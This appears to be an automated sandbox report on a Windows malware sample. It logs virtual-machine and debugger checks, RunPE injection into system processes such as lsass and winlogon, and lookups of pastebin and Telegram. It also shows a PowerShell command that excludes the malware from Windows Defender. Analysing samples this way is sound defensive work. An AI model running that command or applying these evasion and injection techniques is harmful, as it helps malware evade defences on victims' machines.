                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: svchost.exe, 0000001E.00000000.1581250955.0000023314A02000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                              Source: lsass.exe, 0000000A.00000000.1462343927.00000213BCE89000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: pvmicheartbeatNT SERVICE
                              Source: svchost.exe, 00000027.00000000.1650153934.000001A6DDA2B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: dwm.exe, 0000000C.00000003.2106459407.0000026DACB82000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                              Source: Microsoft-Windows-PowerShell%4Operational.evtx.21.dr | Binary or memory string: -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
                              Source: C:\Windows\System32\dllhost.exe | API call chain: ExitProcess graph end node graph_6-8071
                              Source: C:\ProgramData\KrnlSetupSus.exe | Process information queried: ProcessInformation

                              Anti Debugging

                              Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_00007FFB4ADF7B41 CheckRemoteDebuggerPresent,3_2_00007FFB4ADF7B41
                              Source: C:\ProgramData\KrnlSetupSus.exe | Process queried: DebugPort
                              Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C568270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1C568270
                              Source: C:\ProgramData\Install.exe | Code function: 2_2_007C1868 GetProcessHeap,HeapAlloc,StrCpyW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrCatW,2_2_007C1868
                              Source: C:\ProgramData\KrnlSetupSus.exe | Process token adjusted: Debug
                              Source: C:\ProgramData\KrnlSetupSus.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                              Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C5685D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1C5685D4
                              Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C568270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1C568270
                              Source: C:\ProgramData\KrnlSetupSus.exe | Code function: 3_2_1C56CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1C56CB40
                              Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD08270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000290EDD08270
                              Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD085D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00000290EDD085D4
                              Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_00000290EDD0CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000290EDD0CB40
                              Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E9917585D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000002E9917585D4
                              Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E99175CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000002E99175CB40
                              Source: C:\Windows\System32\winlogon.exe | Code function: 7_2_000002E991758270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000002E991758270
                              Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCECB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000213BDCECB40
                              Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCE8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00000213BDCE8270
                              Source: C:\Windows\System32\lsass.exe | Code function: 10_2_00000213BDCE85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00000213BDCE85D4
                              Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709DCB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000158709DCB40
                              Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709D8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00000158709D8270
                              Source: C:\Windows\System32\svchost.exe | Code function: 11_2_00000158709D85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00000158709D85D4
                              Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB15885D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0000026DB15885D4
                              Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB1588270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000026DB1588270
                              Source: C:\Windows\System32\dwm.exe | Code function: 12_2_0000026DB158CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0000026DB158CB40
                              Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F0668270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002A3F0668270
                              Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F066CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_000002A3F066CB40
                              Source: C:\Windows\System32\svchost.exe | Code function: 13_2_000002A3F06685D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_000002A3F06685D4
                              Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBBCB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002C9AFBBCB40
                              Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBB8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000002C9AFBB8270
                              Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002C9AFBB85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000002C9AFBB85D4
                              Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD48270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002C06FD48270
                              Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD485D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_000002C06FD485D4
                              Source: C:\Windows\System32\svchost.exe | Code function: 16_2_000002C06FD4CB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_000002C06FD4CB40
                              Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3B85D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_000002917C3B85D4
                              Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3B8270 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000002917C3B8270
                              Source: C:\Windows\System32\svchost.exe | Code function: 17_2_000002917C3BCB40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_000002917C3BCB40
                              Source: C:\Users\user\Desktop\RdLfpZY5A9.exe | Memory allocated: page read and write | page guard

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Windows\System32\svchost.exe Domain query: pastebin.com
                              Source: C:\Windows\System32\svchost.exe Domain query: api.telegram.org
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
                              Source: 2.0.Install.exe.7c40b0.1.raw.unpack, RunPE.cs .Net Code: Run contains injection code
                              Source: 4.2.powershell.exe.1a84bcc81a8.13.raw.unpack, RunPE.cs .Net Code: Run contains injection code
                              Source: 4.2.powershell.exe.1a854270000.16.raw.unpack, RunPE.cs .Net Code: Run contains injection code
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, Unhook.cs Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
                              Source: 2.2.Install.exe.7c40b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
                              Source: C:\ProgramData\KrnlSetupSus.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe'
                              Source: C:\Windows\System32\dllhost.exe Code function: 6_2_00000001400024C4 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 6_2_00000001400024C4
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 91722C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: BDCB2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 709A2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: B1552C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EFFC2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AFB82C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F7B2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7C382C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 82772C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 1B1D2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6AD42C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3CA2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73D32C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 21B2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B9FD2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 54D82C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 57DA2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 33B42C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 74532C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 15742C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: C8542C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 212A2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6D542C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D8952C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4332C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 8E72C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 19362C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 31802C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: DD9B2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: FA1C2C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\spoolsv.exe EIP: D52C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D2562C8C
                              Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5192C8C
                              Source: C:\ProgramData\KrnlSetupSus.exe NtQuerySystemInformation: Indirect: 0x1C562245
                              Source: C:\ProgramData\KrnlSetupSus.exe NtResumeThread: Indirect: 0x1C5624DE
                              Source: C:\ProgramData\KrnlSetupSus.exe NtQuerySystemInformation: Indirect: 0x1C5633EB
                              Source: C:\ProgramData\KrnlSetupSus.exe NtEnumerateValueKey: Indirect: 0x1C562BB2
                              Source: C:\ProgramData\KrnlSetupSus.exe NtEnumerateKey: Indirect: 0x1C562AE6
                              Source: C:\ProgramData\KrnlSetupSus.exe NtEnumerateValueKey: Indirect: 0x1C562BE1
                              Source: C:\ProgramData\KrnlSetupSus.exe NtEnumerateKey: Indirect: 0x1C562B19
                              Source: C:\ProgramData\KrnlSetupSus.exe NtQueryDirectoryFile: Indirect: 0x1C56257B
                              Source: C:\ProgramData\KrnlSetupSus.exe NtDeviceIoControlFile: Indirect: 0x1C562E41
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 26DB1550000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22382770000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D6B1010000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2036E580000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB570000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 7F80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10B60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2256CFB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2C00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E4E5CC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 282093A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C891080000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF983B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1924DB90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2FB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000 value starts with: 4D5AJump to behavior
